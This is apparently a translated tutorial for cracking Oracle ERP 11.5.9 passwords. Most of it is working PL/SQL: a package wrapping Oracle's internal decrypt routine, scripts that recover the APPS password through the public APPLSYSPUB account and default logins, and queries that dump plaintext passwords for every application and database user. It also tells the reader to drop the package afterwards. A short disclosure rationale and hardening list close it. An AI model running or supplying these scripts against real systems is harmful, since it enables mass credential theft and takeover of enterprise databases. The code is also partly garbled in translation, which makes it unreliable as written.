Cracking Oracle ERP passwords

1. Writing Purpose

2. Create a Package in Oracle ERP Database Using Toad or other pl/SQL tools. The source code is as follows:

(1) create a Package Header

(2) create a Package Body.

3. Steps for obtaining the APPS Password

4. Use any User name/password to obtain the APPS password

5. Use FND_USER: ENCRYPTED_USER_PASSWORD to obtain the plaintext Password

6. Use the Package created above to obtain the password of all Oracle ERP Application users

7. How to obtain the password of all Oracle ERP Database users through the Package created above

8. Delete the Package created in step 1

9. Conclusion

10. Improve the security of Oracle ERP

11. This program passed the Toad test in Oracle ERP 11.5.9

 

1. 1. Writing Purpose

I have been thinking about this issue for a long time, but I think that the method of password cracking will still be known sooner or later, instead of letting a few people know about it, it is better to let everyone know that we should take precautions in advance.

The purpose of publishing the password cracking method is to make Oracle ERP more secure, so that we can use it with confidence. After all, it is tens of millions of things, the current security obviously does not meet the user's requirements. I want to use everyone's strength to put a little pressure on Oracle to make it safer for all Oracle ERP versions.

2. Create a Package in Oracle ERP Database Using Toad or other pl/SQL tools. The source code is as follows:

(1) create a Package Header

Create or replace package CrackPwd AUTHID CURRENT_USER

AS

FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)

RETURN VARCHAR2;

END CrackPwd;

 

(2) create a Package Body

Create or replace package body CrackPwd

AS

FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)

RETURN VARCHAR2

AS

LANGUAGE JAVA

NAME 'oracle. apps. fnd. security. WebSessionManagerProc. decrypt (java. lang. String, java. lang. String) return java. lang. string ';

END CrackPwd;

/

3. Steps for obtaining the APPS Password

Assuming that Oracle erp has no permissions, how can we know the permissions of oracle erp databaes? We know that Oracle erp provides a database Public Account (gateway user), which has the minimum permissions for the database. This public account is: APPLSYSPUB/PUB (this account is made public on the oracle erp Web page or URL). Although this account does not have any permissions, it has the query permission of FND_USER_VIEW, this view shows all the users in erp and Their ENCRYPED_FOUNDATION_PASSWORD fields. The problem lies in the ENCRYPED_FOUNDATION_PASSWORD field of this view, the ENCRYPED_FOUNDATION_PASSWORD field is obtained by the APPS password and the user password through the encryption algorithm, therefore, as long as you know the Oracle ERP decryption algorithm, you can use any user password in fnd_user to reverse query the apps password ., it is too easy to know the password of any user in fnd_user. Many accounts are preset during erp installation. The user names and passwords of these accounts are the same, generally, no one has changed the passwords of these accounts.

4. 4. Use any User name/password to obtain the APPS password

SET SERVEROUTPUT ON

DECLARE

GuestUserPwd VARCHAR2 (200 );

GuestUserName VARCHAR2 (100 );

GuestFndPwd VARCHAR2 (100 );

GuestEncFndPwd VARCHAR2 (100 );

Delim NUMBER;

BEGIN

GuestUserPwd: = 'guest/ORACLE '; -- Can any user password

IF guestUserPwd IS NULL THEN

GuestUserPwd: = UPPER (fnd_profile.value ('guest _ USER_PWD '));

End if;

Delim: = INSTR (guestUserPwd ,'/');

GuestUserName: = UPPER (SUBSTR (guestUserPwd, 1, delim-1 ));

SELECT encrypted_foundation_password INTO guestEncFndPwd

FROM fnd_user_view

WHERE user_name = guestUserName AND (start_date <= SYSDATE) AND

(End_date is null or end_date> SYSDATE );

GuestFndPwd: = CrackPwd. getpwd (guestUserPwd, guestEncFndPwd );

If not (guestFndPwd is null) THEN

DBMS_OUTPUT.put_line (guestFndPwd );

End if;

END;

 

Note: guestUserPwd: = 'guest/ORACLE '; -- Can any user password

The above line can be changed to the username/password of any User, and the account and password are separated "/"

The above program can be executed using toad

5. 5. Use FND_USER: ENCRYPTED_USER_PASSWORD to obtain the plaintext Password

SET SERVEROUT ON

DECLARE

V_encrypted_pwd VARCHAR2 (100 );

V_1__pwd VARCHAR2 (100 );

V_user_pwd VARCHAR (100 );

BEGIN

V_encrypted_pwd: = 'zga05468ea2c7a00ce5d9ed6562b352364325d40a247d58

3C10B916D88062771250F4BE653891CA90671C74187B132118335 ';

-- Get ENCRYPTED_USER_PASSWORD from fnd_user

IF v_1__pwd IS NULL

THEN

V_1__pwd: = 'apps ';

End if;

V_user_pwd: = crackpwd. getpwd (v_1__pwd, v_encrypted_pwd );

DBMS_OUTPUT.put_line (v_user_pwd );

END;

 

6. 6. Use the Package created above to obtain the password of all Oracle ERP Application users

SELECT user_name, CrackPwd. getpwd ('appls', ENCRYPTED_USER_PASSWORD) pwd from apps. fnd_user

 

7. 7. How to obtain the password of all Oracle ERP Database users through the Package created above

Select fou. oracle_username, CrackPwd. getpwd ('apps', encrypted_oracle_password) pwd from APPS. fnd_oracle_userid fou

8. 8. Delete the Package created in step 1

Drop package CrackPwd

 

9. Conclusion

11). As long as you know the password of any person in fnd_user, you can push back the APPS password, even if you change the apps password in the database.
22). In turn, as long as you know the password of apps, all the user passwords in fnd_user can be reversed.
33). Similarly, as long as you know the password of any person in fnd_user, you can reverse the password of all other users.
44). Similarly, the encryption algorithm of the password in oracle erp db user (table: fnd_oracle_userid) is the same as that of fnd_user. That is to say, if you know the password of APPS, all the passwords of db users can be reversed.

1010. Improve the security of Oracle ERP

(1). change the password of APPS

(2) change the password of all users in all pre-installed fnd_user

(3) change the password of all users in oracle erp database (query by table: fnd_oracle_userid)

(4). Change the pre-configured GUEST account password in Profile: GUEST_USER_PWD.

(5) Try not to connect the Database through the public network.

(6) After a User leaves the company, his/her password must be changed before being deactivated.

However, this method does not prevent internal users from knowing the APPS password. Only when all your passwords have been changed can you connect to the ERP Database on the Internet.

11. This program passed in Oracle ERP 11.5.9